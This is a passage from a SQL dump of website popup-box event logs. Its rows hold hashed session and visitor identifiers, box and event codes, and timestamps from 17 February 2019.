(59946, 'd67695214c2e4cd758ff261289064578', 'fc794f0a80972404', 0, 2, 1, '2019-02-17 05:59:54'),
(59947, '76d6358f43eb7c6363859b2d48c52f8b', '8607243faf915263', 0, 2, 1, '2019-02-17 06:00:16'),
(59948, '59feb20e9f4877e962e14c1f7a27477f', '9b4e9691374cabf9', 0, 2, 1, '2019-02-17 06:00:36'),
(59949, '59feb20e9f4877e962e14c1f7a27477f', '9b4e9691374cabf9', 0, 2, 1, '2019-02-17 06:00:50'),
(59950, 'c54177830acd356bef2b3611946dcf59', 'fdcb4f3e52218668', 0, 2, 1, '2019-02-17 06:01:04'),
(59951, '39b409a890e564814773d025dc57ba12', 'df27b9a2919a8206', 0, 2, 1, '2019-02-17 06:01:20'),
(59952, '057472f77299ab91f6be3823da38aec2', '0bf16c319bd2f666', 0, 2, 1, '2019-02-17 06:01:25'),
(59953, '39b409a890e564814773d025dc57ba12', 'df27b9a2919a8206', 0, 2, 1, '2019-02-17 06:01:40'),
(59954, '02b796c5c7dd2a01b2d00b64b82e688e', '2034f09284a4c7ca', 0, 2, 1, '2019-02-17 06:01:51'),
(59955, 'c0c4a4ff71f9d92035ca1563639004b4', '46713cac27a94b83', 0, 2, 1, '2019-02-17 06:05:06'),
(59956, '39b409a890e564814773d025dc57ba12', 'df27b9a2919a8206', 0, 2, 1, '2019-02-17 06:05:31'),
(59957, '39b409a890e564814773d025dc57ba12', 'df27b9a2919a8206', 0, 2, 1, '2019-02-17 06:06:17'),
(59958, 'b2d83c693c1d8c713eea44d46f3842b9', '8bf4306b09063bb5', 0, 2, 1, '2019-02-17 06:06:24'),
(59959, 'ad50cd50e31dca5a6162b9617dc87f69', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-17 06:11:35'),
(59960, '3790117ec2f2bb1d4f500d86c1efda79', 'f10990f26adcd1c5', 0, 2, 1, '2019-02-17 06:13:29'),
(59961, 'ad50cd50e31dca5a6162b9617dc87f69', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-17 06:14:31'),
(59962, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 06:15:03'),
(59963, '8d784a2817978a50513d9d4a44f4a54b', '5a6e6fc8df61f23d', 0, 2, 1, '2019-02-17 06:15:05'),
(59964, '3790117ec2f2bb1d4f500d86c1efda79', 'f10990f26adcd1c5', 0, 2, 1, '2019-02-17 06:18:59'),
(59965, '59feb20e9f4877e962e14c1f7a27477f', '9b4e9691374cabf9', 0, 2, 1, '2019-02-17 06:19:13'),
(59966, '77bb620fe766b1aef7811261a6a1bd49', '3de88ff4581dab27', 0, 2, 1, '2019-02-17 06:19:23'),
(59967, '3790117ec2f2bb1d4f500d86c1efda79', 'f10990f26adcd1c5', 0, 2, 1, '2019-02-17 06:19:23'),
(59968, 'ad50cd50e31dca5a6162b9617dc87f69', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-17 06:19:56'),
(59969, '77bb620fe766b1aef7811261a6a1bd49', '3de88ff4581dab27', 0, 2, 1, '2019-02-17 06:20:00'),
(59970, 'acc689c3101f67e383a985b7f3faae0f', '7501b42c35accff7', 0, 2, 1, '2019-02-17 06:20:04'),
(59971, '59feb20e9f4877e962e14c1f7a27477f', '9b4e9691374cabf9', 0, 2, 1, '2019-02-17 06:21:04'),
(59972, '59feb20e9f4877e962e14c1f7a27477f', '9b4e9691374cabf9', 0, 2, 1, '2019-02-17 06:21:30'),
(59973, '7f64deff28bf46d1579ef12021227205', 'c7d4ce8b0de12339', 0, 2, 1, '2019-02-17 06:25:05'),
(59974, '3336c9bc8d5fcb3dd8f277c96e6ca355', '9b439e4e6dd53e8a', 0, 2, 1, '2019-02-17 06:26:17'),
(59975, 'eb438418b4cc2e9c2d7fd3add464f3e2', 'baa8d16c1a4e5230', 0, 2, 1, '2019-02-17 06:27:34'),
(59976, 'eb438418b4cc2e9c2d7fd3add464f3e2', 'baa8d16c1a4e5230', 0, 2, 1, '2019-02-17 06:27:43'),
(59977, '057472f77299ab91f6be3823da38aec2', '0bf16c319bd2f666', 0, 2, 1, '2019-02-17 06:27:51'),
(59978, '1d091d80a48ead422542429a23647ce4', '620a00bd218b158c', 0, 2, 1, '2019-02-17 06:28:13'),
(59979, 'c0c4a4ff71f9d92035ca1563639004b4', '46713cac27a94b83', 0, 2, 1, '2019-02-17 06:31:27'),
(59980, '3336c9bc8d5fcb3dd8f277c96e6ca355', '9b439e4e6dd53e8a', 0, 2, 1, '2019-02-17 06:32:04'),
(59981, '057472f77299ab91f6be3823da38aec2', '0bf16c319bd2f666', 0, 2, 1, '2019-02-17 06:32:56'),
(59982, '057472f77299ab91f6be3823da38aec2', '0bf16c319bd2f666', 0, 2, 1, '2019-02-17 06:33:36'),
(59983, 'b2b3dfd44c72bc443f7307b10a9f4d0a', '21a75882f832ae93', 0, 2, 1, '2019-02-17 06:33:44'),
(59984, '3790117ec2f2bb1d4f500d86c1efda79', 'f10990f26adcd1c5', 0, 2, 1, '2019-02-17 06:33:47'),
(59985, '3a6d2187dc9edb334882e10d904a70ac', 'b22ff80b39fc8736', 0, 2, 1, '2019-02-17 06:34:11'),
(59986, '3a6d2187dc9edb334882e10d904a70ac', 'b22ff80b39fc8736', 0, 2, 1, '2019-02-17 06:34:19'),
(59987, '3790117ec2f2bb1d4f500d86c1efda79', 'f10990f26adcd1c5', 0, 2, 1, '2019-02-17 06:34:21'),
(59988, 'c0c4a4ff71f9d92035ca1563639004b4', '46713cac27a94b83', 0, 2, 1, '2019-02-17 06:35:28'),
(59989, '222b04714a32dd3f648e7463f1f9247b', '7fc30e8d7ee02d6c', 0, 2, 1, '2019-02-17 06:35:56'),
(59990, '057472f77299ab91f6be3823da38aec2', '0bf16c319bd2f666', 0, 2, 1, '2019-02-17 06:36:06'),
(59991, '057472f77299ab91f6be3823da38aec2', '0bf16c319bd2f666', 0, 2, 1, '2019-02-17 06:36:27'),
(59992, '222b04714a32dd3f648e7463f1f9247b', '7fc30e8d7ee02d6c', 0, 2, 1, '2019-02-17 06:36:52'),
(59993, '54a7293c3716d99c62a31d7ae7cec336', '2c5d66d5c543d2e0', 0, 2, 1, '2019-02-17 06:36:59'),
(59994, '057472f77299ab91f6be3823da38aec2', '0bf16c319bd2f666', 0, 2, 1, '2019-02-17 06:37:40'),
(59995, 'acc689c3101f67e383a985b7f3faae0f', '7501b42c35accff7', 0, 2, 1, '2019-02-17 06:40:40'),
(59996, '0ca637d242960fa315b1fd3a6732be35', '23f552e6bd796ac1', 0, 2, 1, '2019-02-17 06:41:04'),
(59997, '0ca637d242960fa315b1fd3a6732be35', '23f552e6bd796ac1', 0, 2, 1, '2019-02-17 06:41:30'),
(59998, 'acc689c3101f67e383a985b7f3faae0f', '7501b42c35accff7', 0, 2, 1, '2019-02-17 06:41:30'),
(59999, 'a462a6c88ad61234701df7f681b470b9', 'f52a42a05787db8d', 0, 2, 1, '2019-02-17 06:43:13'),
(60000, 'eb438418b4cc2e9c2d7fd3add464f3e2', 'baa8d16c1a4e5230', 0, 2, 1, '2019-02-17 06:43:33'),
(60001, '0ca637d242960fa315b1fd3a6732be35', '23f552e6bd796ac1', 0, 2, 1, '2019-02-17 06:43:54'),
(60002, '0ca637d242960fa315b1fd3a6732be35', '23f552e6bd796ac1', 0, 2, 1, '2019-02-17 06:44:43'),
(60003, '0ca637d242960fa315b1fd3a6732be35', '23f552e6bd796ac1', 0, 2, 1, '2019-02-17 06:44:51'),
(60004, '7f64deff28bf46d1579ef12021227205', 'c7d4ce8b0de12339', 0, 2, 1, '2019-02-17 06:45:45'),
(60005, 'c0c4a4ff71f9d92035ca1563639004b4', '46713cac27a94b83', 0, 2, 1, '2019-02-17 06:45:46'),
(60006, '9930f3717b379a3a89e62c068ffd0fe4', 'e50451d6d332bac5', 0, 2, 1, '2019-02-17 06:45:51'),
(60007, '9930f3717b379a3a89e62c068ffd0fe4', 'e50451d6d332bac5', 0, 2, 1, '2019-02-17 06:46:09'),
(60008, '50f260d813fb8d8cff912ffa5b5ff456', 'cd931064f096776b', 0, 2, 1, '2019-02-17 06:47:14'),
(60009, '9930f3717b379a3a89e62c068ffd0fe4', 'e50451d6d332bac5', 0, 2, 1, '2019-02-17 06:47:23'),
(60010, 'd2e3535d361812e1e4ec348af0da44fa', '50d02461c9e1908b', 0, 2, 1, '2019-02-17 06:47:32'),
(60011, '9930f3717b379a3a89e62c068ffd0fe4', 'e50451d6d332bac5', 0, 2, 1, '2019-02-17 06:48:08'),
(60012, 'c0c4a4ff71f9d92035ca1563639004b4', '46713cac27a94b83', 0, 2, 1, '2019-02-17 06:48:09'),
(60013, 'f0a2d5d0b80ec1f6f0f812ca4dc0b48c', '0b797fb53ae15810', 0, 2, 1, '2019-02-17 06:48:11'),
(60014, '3a6d2187dc9edb334882e10d904a70ac', 'b22ff80b39fc8736', 0, 2, 1, '2019-02-17 06:50:33'),
(60015, 'd67695214c2e4cd758ff261289064578', 'fc794f0a80972404', 0, 2, 1, '2019-02-17 06:54:43'),
(60016, '7421071829f7ac8cd96874f2fba5e39b', '77d629067fed3a03', 0, 2, 1, '2019-02-17 06:55:09'),
(60017, '54a7293c3716d99c62a31d7ae7cec336', '2c5d66d5c543d2e0', 0, 2, 1, '2019-02-17 06:55:42'),
(60018, '54a7293c3716d99c62a31d7ae7cec336', '2c5d66d5c543d2e0', 0, 2, 1, '2019-02-17 06:55:57'),
(60019, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 06:57:13'),
(60020, '1a278b28c87f1832fd561af620ad9aee', 'c123e74a1d22036a', 0, 2, 1, '2019-02-17 06:58:35'),
(60021, '74c626312d244302977ae049d3574ea1', 'f19010d8a5f137d0', 0, 2, 1, '2019-02-17 07:01:57'),
(60022, 'b53d7a66f336695dac5540c781f182f2', '50d02461c9e1908b', 0, 2, 1, '2019-02-17 07:06:06'),
(60023, '1458d938756d0b62c284123116c51f2c', 'a639f655bef0fc87', 0, 2, 1, '2019-02-17 07:06:41'),
(60024, '54849ec0f08811cd711faa8cb73a61c5', 'f10990f26adcd1c5', 0, 2, 1, '2019-02-17 07:11:20'),
(60025, 'acc689c3101f67e383a985b7f3faae0f', '7501b42c35accff7', 0, 2, 1, '2019-02-17 07:11:30'),
(60026, 'acc689c3101f67e383a985b7f3faae0f', '7501b42c35accff7', 0, 2, 1, '2019-02-17 07:11:44'),
(60027, 'acc689c3101f67e383a985b7f3faae0f', '7501b42c35accff7', 0, 2, 1, '2019-02-17 07:12:39'),
(60028, 'd67695214c2e4cd758ff261289064578', 'fc794f0a80972404', 0, 2, 1, '2019-02-17 07:13:05'),
(60029, '9809688e90a8ebb5f7aedd627ae04b5f', '0d6d214e577e9800', 0, 2, 1, '2019-02-17 07:13:23'),
(60030, 'ad70e4505847482ece6bfba2e9c4bcd9', '4f54865a6d244b6c', 0, 2, 1, '2019-02-17 07:13:34'),
(60031, 'ad70e4505847482ece6bfba2e9c4bcd9', '4f54865a6d244b6c', 0, 2, 1, '2019-02-17 07:13:58'),
(60032, 'a04eb2a95ed4ea15a4c14c83cdf00f82', 'b1c7a40b6f86d6f8', 0, 2, 1, '2019-02-17 07:14:10'),
(60033, 'a462a6c88ad61234701df7f681b470b9', 'f52a42a05787db8d', 0, 2, 1, '2019-02-17 07:14:49'),
(60034, 'ad70e4505847482ece6bfba2e9c4bcd9', '4f54865a6d244b6c', 0, 2, 1, '2019-02-17 07:16:39'),
(60035, 'b53d7a66f336695dac5540c781f182f2', '50d02461c9e1908b', 0, 2, 1, '2019-02-17 07:17:04'),
(60036, '74c626312d244302977ae049d3574ea1', 'f19010d8a5f137d0', 0, 2, 1, '2019-02-17 07:17:57'),
(60037, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 07:18:01'),
(60038, 'd68560497ff87fa93ba748ed498e059b', '91d3688e197526d0', 0, 2, 1, '2019-02-17 07:18:30'),
(60039, 'd68560497ff87fa93ba748ed498e059b', '91d3688e197526d0', 0, 2, 1, '2019-02-17 07:18:41'),
(60040, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 07:18:43'),
(60041, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 07:18:52'),
(60042, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 07:19:20'),
(60043, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 07:19:38'),
(60044, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 07:19:51'),
(60045, 'd67695214c2e4cd758ff261289064578', 'fc794f0a80972404', 0, 2, 1, '2019-02-17 07:20:30'),
(60046, 'd67695214c2e4cd758ff261289064578', 'fc794f0a80972404', 0, 2, 1, '2019-02-17 07:20:56'),
(60047, '1458d938756d0b62c284123116c51f2c', 'a639f655bef0fc87', 0, 2, 1, '2019-02-17 07:21:33'),
(60048, 'ad70e4505847482ece6bfba2e9c4bcd9', '4f54865a6d244b6c', 0, 2, 1, '2019-02-17 07:22:27'),
(60049, '54a7293c3716d99c62a31d7ae7cec336', '2c5d66d5c543d2e0', 0, 2, 1, '2019-02-17 07:23:01'),
(60050, '54a7293c3716d99c62a31d7ae7cec336', '2c5d66d5c543d2e0', 0, 2, 1, '2019-02-17 07:24:04'),
(60051, '3a93a62341f051166460285683a3a39d', 'd76d7333a72169c4', 0, 2, 1, '2019-02-17 07:25:11'),
(60052, '74c626312d244302977ae049d3574ea1', 'f19010d8a5f137d0', 0, 2, 1, '2019-02-17 07:25:29'),
(60053, '74c626312d244302977ae049d3574ea1', 'f19010d8a5f137d0', 0, 2, 1, '2019-02-17 07:25:50'),
(60054, '1458d938756d0b62c284123116c51f2c', 'a639f655bef0fc87', 0, 2, 1, '2019-02-17 07:26:47'),
(60055, 'ad71ba4ad91baf9e198a2c3d5e60c51e', '53f68319b17ad67b', 0, 2, 1, '2019-02-17 07:27:13'),
(60056, 'ad71ba4ad91baf9e198a2c3d5e60c51e', '53f68319b17ad67b', 0, 2, 1, '2019-02-17 07:27:20'),
(60057, 'd67695214c2e4cd758ff261289064578', 'fc794f0a80972404', 0, 2, 1, '2019-02-17 07:27:58'),
(60058, '1458d938756d0b62c284123116c51f2c', 'a639f655bef0fc87', 0, 2, 1, '2019-02-17 07:28:16'),
(60059, '8f5c67a2305e02c38c1cc665be636671', 'c82195f7827b9487', 0, 2, 1, '2019-02-17 07:28:28'),
(60060, '74c626312d244302977ae049d3574ea1', 'f19010d8a5f137d0', 0, 2, 1, '2019-02-17 07:29:02'),
(60061, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 07:29:56'),
(60062, '1412e4d8aec066cac0838c7d800dcabd', 'b301d833ea94d585', 0, 2, 1, '2019-02-17 07:30:06'),
(60063, '164637e2b05234aaaf2445c83fbc0d30', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-17 07:30:39'),
(60064, '3a93a62341f051166460285683a3a39d', 'd76d7333a72169c4', 0, 2, 1, '2019-02-17 07:30:53'),
(60065, 'a8c33933049723b6e4d361ee9eab2e0a', 'c646fc7086982b63', 0, 2, 1, '2019-02-17 07:31:16'),
(60066, '449b64f9d08c628b809b818924706bf3', '13b29e66c58082e0', 0, 2, 1, '2019-02-17 07:31:20'),
(60067, '3a93a62341f051166460285683a3a39d', 'd76d7333a72169c4', 0, 2, 1, '2019-02-17 07:31:27'),
(60068, 'a8c33933049723b6e4d361ee9eab2e0a', 'c646fc7086982b63', 0, 2, 1, '2019-02-17 07:31:39'),
(60069, '8f5c67a2305e02c38c1cc665be636671', 'c82195f7827b9487', 0, 2, 1, '2019-02-17 07:32:26'),
(60070, '057472f77299ab91f6be3823da38aec2', '0bf16c319bd2f666', 0, 2, 1, '2019-02-17 07:32:58'),
(60071, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 07:32:58'),
(60072, '0629a192b444ad17ebd5624f1d608247', '4fa83dd66d754b91', 0, 2, 1, '2019-02-17 07:33:32'),
(60073, '0629a192b444ad17ebd5624f1d608247', '4fa83dd66d754b91', 0, 2, 1, '2019-02-17 07:34:22'),
(60074, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 07:34:45'),
(60075, '0d0a8e1ee74e3e147ccbb75d2332b54b', 'd48d63cb4375f0da', 0, 2, 1, '2019-02-17 07:35:05'),
(60076, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 07:35:13'),
(60077, '164637e2b05234aaaf2445c83fbc0d30', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-17 07:35:15');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(60078, '0d0a8e1ee74e3e147ccbb75d2332b54b', 'd48d63cb4375f0da', 0, 2, 1, '2019-02-17 07:35:19'),
(60079, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 07:35:27'),
(60080, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 07:35:55'),
(60081, '1a278b28c87f1832fd561af620ad9aee', 'c123e74a1d22036a', 0, 2, 1, '2019-02-17 07:35:55'),
(60082, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 07:36:23'),
(60083, '164637e2b05234aaaf2445c83fbc0d30', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-17 07:36:34'),
(60084, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 07:37:02'),
(60085, '1458d938756d0b62c284123116c51f2c', 'a639f655bef0fc87', 0, 2, 1, '2019-02-17 07:37:09'),
(60086, 'c3d4a79e44a40ea617c675de8311bd8c', '5d150e66684db7f9', 0, 2, 1, '2019-02-17 07:37:20'),
(60087, '2fe6b52f7953396cdca3f4d348f2fcbc', '135f23c8a85974ba', 0, 2, 1, '2019-02-17 07:37:47'),
(60088, '2ea9611a0245490fcc74059565191416', '6e117bd555667400', 0, 2, 1, '2019-02-17 07:37:50'),
(60089, '832fffc337ce8d9d5038e64fe259dd9b', '1d1658c97bef6ed6', 0, 2, 1, '2019-02-17 07:38:44'),
(60090, '3a93a62341f051166460285683a3a39d', 'd76d7333a72169c4', 0, 2, 1, '2019-02-17 07:38:45'),
(60091, '832fffc337ce8d9d5038e64fe259dd9b', '1d1658c97bef6ed6', 0, 2, 1, '2019-02-17 07:39:03'),
(60092, '3a93a62341f051166460285683a3a39d', 'd76d7333a72169c4', 0, 2, 1, '2019-02-17 07:39:20'),
(60093, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 07:40:17'),
(60094, 'eb438418b4cc2e9c2d7fd3add464f3e2', 'baa8d16c1a4e5230', 0, 2, 1, '2019-02-17 07:42:18'),
(60095, '3a93a62341f051166460285683a3a39d', 'd76d7333a72169c4', 0, 2, 1, '2019-02-17 07:42:57'),
(60096, '6aec7114d05175f9a541f84814bd39b3', 'fc794f0a80972404', 0, 2, 1, '2019-02-17 07:43:48'),
(60097, 'feab512750e159b11fea86b35f7ff17b', 'eb2ee7591604e055', 0, 2, 1, '2019-02-17 07:43:51'),
(60098, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 07:44:11'),
(60099, 'feab512750e159b11fea86b35f7ff17b', 'eb2ee7591604e055', 0, 2, 1, '2019-02-17 07:44:33'),
(60100, 'a8c33933049723b6e4d361ee9eab2e0a', 'c646fc7086982b63', 0, 2, 1, '2019-02-17 07:45:01'),
(60101, '156c06e86f3c2ed951ed29e5f902b78f', '4f54865a6d244b6c', 0, 2, 1, '2019-02-17 07:45:21'),
(60102, '1e1435b30f8c5fccde8703d2e00d11fb', '36ec0fc4333f24db', 0, 2, 1, '2019-02-17 07:46:08'),
(60103, '1e1435b30f8c5fccde8703d2e00d11fb', '36ec0fc4333f24db', 0, 2, 1, '2019-02-17 07:46:51'),
(60104, '65de01de35bdba83160b49eff8230b91', 'c40cb1cc5eb13bc9', 0, 2, 1, '2019-02-17 07:48:39'),
(60105, '1a278b28c87f1832fd561af620ad9aee', 'c123e74a1d22036a', 0, 2, 1, '2019-02-17 07:49:18'),
(60106, '6ff2867713dad00e3e7b4f757450f5b7', '7501cef3123ed231', 0, 2, 1, '2019-02-17 07:50:09'),
(60107, '832fffc337ce8d9d5038e64fe259dd9b', '1d1658c97bef6ed6', 0, 2, 1, '2019-02-17 07:50:28'),
(60108, '250d9204af7a8c12e4351f65fc175290', '16f9a68ee40103c5', 0, 2, 1, '2019-02-17 07:50:39'),
(60109, '250d9204af7a8c12e4351f65fc175290', '16f9a68ee40103c5', 0, 2, 1, '2019-02-17 07:51:38'),
(60110, '250d9204af7a8c12e4351f65fc175290', '16f9a68ee40103c5', 0, 2, 1, '2019-02-17 07:51:56'),
(60111, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 07:52:11'),
(60112, '2993e4f710da02c4516377db842e0b7c', '74aba437eea39f30', 0, 2, 1, '2019-02-17 07:52:33'),
(60113, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 07:52:41'),
(60114, '832101422a765b14fbaf3b9b7abfec87', 'b453f7c003bf64ff', 0, 2, 1, '2019-02-17 07:52:48'),
(60115, '2993e4f710da02c4516377db842e0b7c', '74aba437eea39f30', 0, 2, 1, '2019-02-17 07:52:52'),
(60116, '2993e4f710da02c4516377db842e0b7c', '74aba437eea39f30', 0, 2, 1, '2019-02-17 07:53:08'),
(60117, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 07:53:57'),
(60118, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 07:54:28'),
(60119, '164637e2b05234aaaf2445c83fbc0d30', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-17 07:54:59'),
(60120, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 07:55:01'),
(60121, '057472f77299ab91f6be3823da38aec2', '0bf16c319bd2f666', 0, 2, 1, '2019-02-17 07:55:03'),
(60122, '855fec4063eb68bac98c8081b7934a37', '503a514a8daa32a7', 0, 2, 1, '2019-02-17 07:55:25'),
(60123, '54849ec0f08811cd711faa8cb73a61c5', 'f10990f26adcd1c5', 0, 2, 1, '2019-02-17 07:55:51'),
(60124, '6d42f45866bef7659b7a12d6a5a4e695', '4fa83dd66d754b91', 0, 2, 1, '2019-02-17 07:56:25'),
(60125, '2993e4f710da02c4516377db842e0b7c', '74aba437eea39f30', 0, 2, 1, '2019-02-17 07:56:42'),
(60126, 'acc689c3101f67e383a985b7f3faae0f', '7501b42c35accff7', 0, 2, 1, '2019-02-17 07:56:49'),
(60127, '77bb620fe766b1aef7811261a6a1bd49', '3de88ff4581dab27', 0, 2, 1, '2019-02-17 07:57:12'),
(60128, '6d42f45866bef7659b7a12d6a5a4e695', '4fa83dd66d754b91', 0, 2, 1, '2019-02-17 07:57:16'),
(60129, '41e33241182bc88bfc4e1340f7366873', '91d21119de46096c', 0, 2, 1, '2019-02-17 07:57:45'),
(60130, 'b840aff5aeba06ab9fda8998284d0a16', '93f30eaefda9d8c4', 0, 2, 1, '2019-02-17 07:57:56'),
(60131, '41e33241182bc88bfc4e1340f7366873', '91d21119de46096c', 0, 2, 1, '2019-02-17 07:57:57'),
(60132, 'f6cab42f1576e777af92c6c95ef0e0bf', '1b72d806225e02fe', 0, 2, 1, '2019-02-17 07:58:07'),
(60133, '54849ec0f08811cd711faa8cb73a61c5', 'f10990f26adcd1c5', 0, 2, 1, '2019-02-17 07:59:42'),
(60134, '868a9c3ccc97546e534548dceb93dfec', '3e9a5f85df12594b', 0, 2, 1, '2019-02-17 07:59:55'),
(60135, '868a9c3ccc97546e534548dceb93dfec', '3e9a5f85df12594b', 0, 2, 1, '2019-02-17 08:00:04'),
(60136, 'acc689c3101f67e383a985b7f3faae0f', '7501b42c35accff7', 0, 2, 1, '2019-02-17 08:00:15'),
(60137, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 08:00:55'),
(60138, '6d42f45866bef7659b7a12d6a5a4e695', '4fa83dd66d754b91', 0, 2, 1, '2019-02-17 08:01:01'),
(60139, '7527c70e0adaec0ba7509c097f39d1b3', 'd57c6a47a6711062', 0, 2, 1, '2019-02-17 08:01:52'),
(60140, '74c626312d244302977ae049d3574ea1', 'f19010d8a5f137d0', 0, 2, 1, '2019-02-17 08:02:19'),
(60141, 'd8bea6686db2e299e88cf9ea66fda478', 'b50d65df97c0251e', 0, 2, 1, '2019-02-17 08:02:22'),
(60142, '0d0a8e1ee74e3e147ccbb75d2332b54b', 'd48d63cb4375f0da', 0, 2, 1, '2019-02-17 08:02:39'),
(60143, '832fffc337ce8d9d5038e64fe259dd9b', '1d1658c97bef6ed6', 0, 2, 1, '2019-02-17 08:02:48'),
(60144, '0d0a8e1ee74e3e147ccbb75d2332b54b', 'd48d63cb4375f0da', 0, 2, 1, '2019-02-17 08:02:51'),
(60145, 'c3d4a79e44a40ea617c675de8311bd8c', '5d150e66684db7f9', 0, 2, 1, '2019-02-17 08:03:28'),
(60146, '2fe6b52f7953396cdca3f4d348f2fcbc', '135f23c8a85974ba', 0, 2, 1, '2019-02-17 08:04:21'),
(60147, 'f6793b319a7c205f153d169c5a57d7e6', 'b58e4f885738dd6f', 0, 2, 1, '2019-02-17 08:04:49'),
(60148, 'f6793b319a7c205f153d169c5a57d7e6', 'b58e4f885738dd6f', 0, 2, 1, '2019-02-17 08:05:07'),
(60149, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 08:05:22'),
(60150, '3582cb64569893f82dee5c0ce733e18a', '32d7b33c71d23276', 0, 2, 1, '2019-02-17 08:05:43'),
(60151, '2fe6b52f7953396cdca3f4d348f2fcbc', '135f23c8a85974ba', 0, 2, 1, '2019-02-17 08:06:29'),
(60152, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 08:06:30'),
(60153, '3582cb64569893f82dee5c0ce733e18a', '32d7b33c71d23276', 0, 2, 1, '2019-02-17 08:06:34'),
(60154, '3582cb64569893f82dee5c0ce733e18a', '32d7b33c71d23276', 0, 2, 1, '2019-02-17 08:06:48'),
(60155, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-02-17 08:07:02'),
(60156, '3336c9bc8d5fcb3dd8f277c96e6ca355', '9b439e4e6dd53e8a', 0, 2, 1, '2019-02-17 08:07:02'),
(60157, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 08:07:11'),
(60158, '46d26b55b3e6b68a23fb8cd355c9e419', '5d11a454044e400d', 0, 2, 1, '2019-02-17 08:07:31'),
(60159, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 08:07:44'),
(60160, '3336c9bc8d5fcb3dd8f277c96e6ca355', '9b439e4e6dd53e8a', 0, 2, 1, '2019-02-17 08:08:16'),
(60161, '1a278b28c87f1832fd561af620ad9aee', 'c123e74a1d22036a', 0, 2, 1, '2019-02-17 08:08:23'),
(60162, '1a278b28c87f1832fd561af620ad9aee', 'c123e74a1d22036a', 0, 2, 1, '2019-02-17 08:08:29'),
(60163, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 08:08:37'),
(60164, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-02-17 08:08:57'),
(60165, '7a9180e11ad85e9331af2b49b9bd4c40', '66a36e20632e2653', 0, 2, 1, '2019-02-17 08:09:45'),
(60166, '0aed4affbc9dced2a8d0366f07c51baf', 'aebe4806f0311e79', 0, 2, 1, '2019-02-17 08:10:49'),
(60167, '3117ea3f06ecd953e019ef6203c7a27f', '68e262710bf07c1c', 0, 2, 1, '2019-02-17 08:11:04'),
(60168, '0aed4affbc9dced2a8d0366f07c51baf', 'aebe4806f0311e79', 0, 2, 1, '2019-02-17 08:11:13'),
(60169, '3117ea3f06ecd953e019ef6203c7a27f', '68e262710bf07c1c', 0, 2, 1, '2019-02-17 08:12:02'),
(60170, '164637e2b05234aaaf2445c83fbc0d30', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-17 08:12:08'),
(60171, 'b840aff5aeba06ab9fda8998284d0a16', '93f30eaefda9d8c4', 0, 2, 1, '2019-02-17 08:12:19'),
(60172, 'd408d4ae152784a57a13446edf897baf', '72173d019600391d', 0, 2, 1, '2019-02-17 08:13:51'),
(60173, 'c3d4a79e44a40ea617c675de8311bd8c', '5d150e66684db7f9', 0, 2, 1, '2019-02-17 08:14:57'),
(60174, '8469205afe887d48cccc2e2ecc6bd56a', '8c117e9ade9703d1', 0, 2, 1, '2019-02-17 08:15:27'),
(60175, 'a363f0c252179395972edb2f7b09686a', '19ac418837a1bfb6', 0, 2, 1, '2019-02-17 08:15:29'),
